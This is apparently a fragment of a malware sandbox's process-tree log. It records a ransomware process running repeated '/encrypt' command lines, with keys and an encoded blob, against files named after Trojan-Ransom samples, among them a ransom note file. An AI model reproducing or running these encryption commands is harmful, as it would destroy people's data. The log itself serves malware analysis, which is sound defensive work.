                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.Win32.Generic-8a57e361887aca6d776de1c2cc8f1f30cfddd2cf882726fab12084f06bda0c1a.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\KEYIDS.KLST.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8052
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.MSIL.Agent.fqnw-d1afbbebb8c29d49b2bec1b5e01cec2d786dc36ede052c35b61978fe3dca1102.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8068
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.fpnf-bc26d4efe4a5f638a12e88f589d0097e67d71c73273fedd2ede0dfe4a41c39df.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8072
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.gibz-eb53d5e2ac26d3f5bd2c4c0d58670a5171197e1e7cc797004612f8801da1aa68.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8080
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8088
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8096
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ldcq-c1da3cbf2c15cb64fb21ee704fedca797bf0f36ee2107015bb5625f0e8dd377b.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8104
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.liwq-a8c1bc0154b82490d3e19ebd3b4cfecb77aad4a5a05106255f69ded514be7ad7.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8108
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8120
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8016
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8148
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8168
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
